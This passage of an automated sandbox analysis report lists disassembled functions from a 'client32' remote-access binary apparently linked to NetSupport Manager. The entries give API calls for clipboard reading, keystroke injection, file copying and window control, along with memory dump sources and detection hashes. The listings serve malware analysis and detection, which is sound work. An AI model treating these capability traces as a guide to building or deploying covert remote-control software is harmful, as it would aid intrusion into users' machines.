                                                                                                                                                                                • GetClientRect.USER32(000019E5,11186ABB), ref: 110CB7F8
                                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                                                                                                                • IsIconic.USER32(000019E5), ref: 110CB844
                                                                                                                                                                                • GetWindowRect.USER32(000019E5,11186ABB), ref: 110CB853
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,11186ABB,000000FF,00000000,00000000,0000001D,00000000,?,00000001,11186ABB,00000002), ref: 110CB907
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                                                • API String ID: 2655531791-1552842965
                                                                                                                                                                                • Opcode ID: 6487a606d23e6cf20a341fe1d6583db818896d3af0177824b89d276cc2aaf0bf
                                                                                                                                                                                • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                                                                                                                • Opcode Fuzzy Hash: 6487a606d23e6cf20a341fe1d6583db818896d3af0177824b89d276cc2aaf0bf
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                                                                                                                Function 110BD520 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 251filewindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 1114580D
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,11110200), ref: 1114584E
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 110BD5E7
                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 110BD629
                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 110BD6B7
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 110BD7C0
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 110BD7DD
                                                                                                                                                                                • DrawMenuBar.USER32(00000000), ref: 110BD8BD
                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 110BD798
                                                                                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Find$ExitFolderPathProcess$AttributesCloseCopyCreateDirectoryDrawErrorFirstLastMenuMessageModuleNameNext__strdup_free_strrchrwsprintf
                                                                                                                                                                                • String ID: *.*$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 3944587170-1484108485
                                                                                                                                                                                • Opcode ID: c62987c39ac73453cd2cd41338d0f299ebd3eeb2004f3088c164dff63be09a50
                                                                                                                                                                                • Instruction ID: 61d64f16e0514fee2739bc31f7a5f98e01592bb8e185bf3aa1b2544a26ab807e
                                                                                                                                                                                • Opcode Fuzzy Hash: c62987c39ac73453cd2cd41338d0f299ebd3eeb2004f3088c164dff63be09a50
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AA17C39D002699BDB55CB64CC94FEEB778AF59308F4041E9D41A67280EF316B88CF61
                                                                                                                                                                                Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                                                                                                • API String ID: 0-293745777
                                                                                                                                                                                • Opcode ID: 118a90c7a26120e227cbf277542c36adea8915eb7a08a1d9b89ce969ccdaa82b
                                                                                                                                                                                • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                                                                                                                • Opcode Fuzzy Hash: 118a90c7a26120e227cbf277542c36adea8915eb7a08a1d9b89ce969ccdaa82b
                                                                                                                                                                                • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                                                                                                                Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                                                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                                                                                                                  • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                                                                                                                  • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                                                                                                  • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                                                                                                                  • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                                                                                                                  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                                                                                                                  • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                                                                                                                  • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                                                                                                                  • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                                                                                                                  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                                                                                                                  • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdatewsprintf
                                                                                                                                                                                • String ID: NSMClassList$NSMFindClassEvent
                                                                                                                                                                                • API String ID: 276154791-2883797795
                                                                                                                                                                                • Opcode ID: 9e4de9e5a224d86c7564a28bf6c03d7418996f0bdce78330643ffa72ff65d509
                                                                                                                                                                                • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e4de9e5a224d86c7564a28bf6c03d7418996f0bdce78330643ffa72ff65d509
                                                                                                                                                                                • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                                                                                                                Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                                                                                                                • GetClipboardData.USER32(?), ref: 1103337D
                                                                                                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 11033406
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                                                                                                • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                                                                                                • API String ID: 1861668072-1296821031
                                                                                                                                                                                • Opcode ID: a84da444c18846564a417b3dab6761513f1b88e714a89d51f69e141268d66c33
                                                                                                                                                                                • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                                                                                                                • Opcode Fuzzy Hash: a84da444c18846564a417b3dab6761513f1b88e714a89d51f69e141268d66c33
                                                                                                                                                                                • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                                                                                                                Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindLoadLock
                                                                                                                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                                                                                                • API String ID: 2752051264-327499879
                                                                                                                                                                                • Opcode ID: 97c1871d41514a13bd575635286e1559e54c7f0a19331009670d2482e32b01c5
                                                                                                                                                                                • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                                                                                                                • Opcode Fuzzy Hash: 97c1871d41514a13bd575635286e1559e54c7f0a19331009670d2482e32b01c5
                                                                                                                                                                                • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                                                                                                                Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                                                                                                • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountIconicTick
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                                                                                                • API String ID: 1307367305-2838568823
                                                                                                                                                                                • Opcode ID: f3897f275f54124ca3b6568bb9a02402679ed71762e39ac1c6a459c2f09a99df
                                                                                                                                                                                • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                                                                                                                • Opcode Fuzzy Hash: f3897f275f54124ca3b6568bb9a02402679ed71762e39ac1c6a459c2f09a99df
                                                                                                                                                                                • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                                                                                                                Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsIconic.USER32(?), ref: 110C10AD
                                                                                                                                                                                • ShowWindow.USER32(?,00000009,?,1105E5B2,00000001,00000001,?,?), ref: 110C10BD
                                                                                                                                                                                • BringWindowToTop.USER32(?), ref: 110C10C7
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$BringCurrentIconicShowThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4184413098-0
                                                                                                                                                                                • Opcode ID: 868c89a674d26471300f78aca34de667bcdd4f87984bbd77ec84606eac92b3fe
                                                                                                                                                                                • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                                                                                                                • Opcode Fuzzy Hash: 868c89a674d26471300f78aca34de667bcdd4f87984bbd77ec84606eac92b3fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                                                                                                                Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                                                                                                                • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
